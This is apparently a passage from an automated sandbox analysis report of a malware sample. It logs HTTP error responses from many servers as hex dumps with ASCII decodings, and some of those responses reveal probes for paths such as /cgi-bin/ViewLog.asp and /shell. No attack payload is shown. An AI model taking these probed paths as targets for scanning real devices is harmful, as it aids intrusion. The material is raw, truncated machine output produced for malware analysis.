6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20 30 34 3a 32 32 3a 32 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 36 20 28 43 65 6e 74 4f 53 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 30 2e 32 6b 2d 66 69 70 73 20 50 48 50 2f 35 2e 34 2e 31 36 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 2f 66 72 65 65 70 62 78 2f 65 72 72 6f 72 2e 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 33 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 2f 66 72 65 65 70 62 78 2f 65 72 72 6f 72 2e 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>HTTP/1.1 301 Moved PermanentlyDate: Thu, 21 Mar 2024 04:22:27 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16Location: https:///freepbx/error.htmlContent-Length: 235Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Perma
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 21 Mar 2024 04:22:28 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20 30 34 3a 32 32 3a 32 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>HTTP/1.1 400 Bad RequestDate: Thu, 21 Mar 2024 04:22:28 GMTServer: ApacheContent-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 21 Mar 2024 04:22:29 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20 30 34 3a 32 32 3a 32 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>HTTP/1.1 400 Bad RequestDate: Thu, 21 Mar 2024 04:22:29 GMTServer: ApacheContent-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu Mar 21 07:22:29 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Mar 2024 04:22:30 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20 30 34 3a 32 32 3a 33 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 32 31 33 2e 39 31 2e 31 35 34 2e 36 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Thu, 21 Mar 2024 04:22:30 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 305Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DT
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Mar 2024 04:22:30 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20 30 34 3a 32 32 3a 33 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 32 31 33 2e 39 31 2e 31 35 34 2e 36 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Thu, 21 Mar 2024 04:22:30 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 305Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DT
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu Mar 21 07:22:30 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu Mar 21 07:22:30 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Mar 2024 04:22:34 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu Mar 21 11:22:34 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu Mar 21 11:22:35 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48X-XSS-Protection: 1;mode=blockContent-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'X-Content-Type-Options: nosniffCONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmllast-modified: Fri, 21 Jan 2022 00:32:37 GMTetag: "999-61e9ff25-cd88ea3f64d127dc;gz"accept-ranges: bytescontent-encoding: gzipvary: Accept-Encodingcontent-length: 1159date: Thu, 21 Mar 2024 04:22:47 GMTserver: LiteSpeedplatform: hostingerData Raw: 1f 8b 08 00 00 00 00 00 00 03 85 56 6d 8f db 36 0c fe 9e 5f a1 ba 1f 92 6c b6 e5 dc f5 35 b1 b3 f5 75 18 b0 f5 06 f4 0a 74 b8 1d 06 46 62 6c f6 64 c9 95 94 4b b2 5e ff fb 20 3b 6f f7 92 cd 80 62 8b 7c 48 51 0f 45 2a f9 a3 b7 67 6f ce ff fc e3 1d ab 7c ad a6 bd 3c bc 98 02 5d 16 11 ea 64 e1 22 d6 58 9c d3 aa 88 84 d1 1e b5 1f b3 ca fb 66 cc 79 b3 b0 2a 35 b6 e4 d6 39 3e 4a 33 5e 1b b9 50 e8 f8 06 c8 99 14 f7 c1 52 70 8f b6 76 9c cd 0d cc 77 fa 55 ad b4 4b 85 a9 79 10 f3 2c 1d 71 66 ca 9d da 94 4d 5a 23 d7 ee 31 b3 72 ee 76 f2 e5 72 99 2e 4f 5b c7 27 59 96 f1 6c c4 ad 9c 27 4e 54 58 c3 63 e6 c8 ec 43 08 86 2d 32 48 5b 57 e1 c3 1f d1 fb 75 83 01 72 65 8e ad f6 84 67 27 3c e8 b9 30 16 1f b3 95 93 47 90 23 fe f9 f7 df 3e 76 31 45 d3 5e 2f af 10 e4 b4 c7 18 63 79 8d 1e 5a ab 04 bf 2e e8 ba 88 de 74 ec 25 e7 eb 06 23 b6 e1 b2 88 3c ae 3c 0f c9 99 30 51 81 75 e8 8b 4f e7 ef 93 17 d1 c6 8f f3 6b 85 2c 44 bd c1 0a e7 36 ba f0 fc bc 31 62 51 67 35 d9 69 2e 74 f9 d7 58 28 03 57 97 f1 a1 30 b9 27 93 e0 21 79 48 b1 7a 48 9a 6e 65 07 a2 3d f0 36 ae 22 89 63 6d fc 60 3b 49 40 53 0d 1e 87 ec db 0e 18 1e 49 ae 51 b0 1e 33 6d 34 b2 47 54 37 c6 7a d0 7e bf 9d ef bd dd 67 d8 d8 dc d8 fa 98 8f 99 32 e2 ea 41 cb 10 c6 26 82 c4 55 74 d7 c3 35 39 9a 91 22 bf 1e b3 8a a4 44 fd 1f 5e 44 65 ec 1d fb c6 38 f2 64 f4 98 c1 cc 19 b5 f0 78 68 df a6 93 b7 f9 3c 76 46 3e 27 9f 5e 25 6f 4c dd 80 a7 99 3a 3c 26 bf be 2b 50 96 18 1d 5a 6a a8 b1 88 ae 09 97 81 ad 03 f0 92 a4 af 0a 89 d7 24 30 69 27 31 23 4d 9e 40 25 4e 80 c2 62 b4 75 e4 c9 2b 9c 9e 99 c6 c5 cc 99 1a 7d 45 ba 64 ca 38 9f f3 4e 77 6f 41 89 4e 58 6a c2 46 0f d6 ec 5c 28 63 ae 1c 53 74 85 cc 57 c8 1a 28 91 91 6b fd a5 ec a3 07 eb d9 da 2c 2c 5b e2 cc 91 47 66 74 8b 13 15 42 93 6e 63 52 a4 af 58 8d 92 a0 88 40 a9 88 59 54 45 d4 12 e7 2a 44 1f b1 ca e2 bc 88 78 e5 a5 11 ee 6f b4 d6 d8 8e d8 74 5f 1d 9d 9b 23 a6 81 74 37 e6 bc 86 95 90 3a 9d 19 e3 9d b7 d0 84 49 68 56 3b 01 3f 4d 4f d3 e7 a1 e8 f6 b2 b4 26 7d 6f a1 db 7e e7 46 7b 97 96 c6 94 0a a1 a1 ae 03 0a e7 7e 9a 43 4d 6a 5d 9c 35 a8 7f fc 08 da 8d 4f b3 2c 3e cd 32 8a 9f 64 59 18 14 3f cb b2 30 28 7e 9e 65 61 50 fc 22 cb c2 a0 fb 4c 4c 7b 9b 2e d1 66 64 df 16 06 f3 85 16 21 43 03 8a 5d 6c e2 32 b6 31 c4 f5 f0 1b 5d f4 7f 69 a3 7a a5 41 ad 3d 09 77 36 fb 82 c2 f7 2f 0b 3b a1 0b 7b 59 84 9f 9b 9b 9d fd f0 f6 11 6f 9d 07 48 fa b5 e8 5e 37 37 17 97 c3 b4 59 b8 6a 00 b6 5c d4 a8 bd 1b 7e 8f 5b a5 2a 46 3f 68 5c b2 b7 e0 71 30 9c 40 e1 52 61 11 3c be 53 18 80 03 33 8c 6f b9 af 0b 97 96 e8 37 6a f7 7a 7d 0e e5 07 a8 71 60 86 17 d9 e5 04 52 70 6b 2d 8a d1 04 52 67 45 51 4e ea b4 01 8b da 7f 30 12 53 d2 0e ad 7f 8
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Mar 2024 04:22:42 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at 127.0.0.1 Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveTransfer-Encoding: chunked
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Mar 2024 04:22:52 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 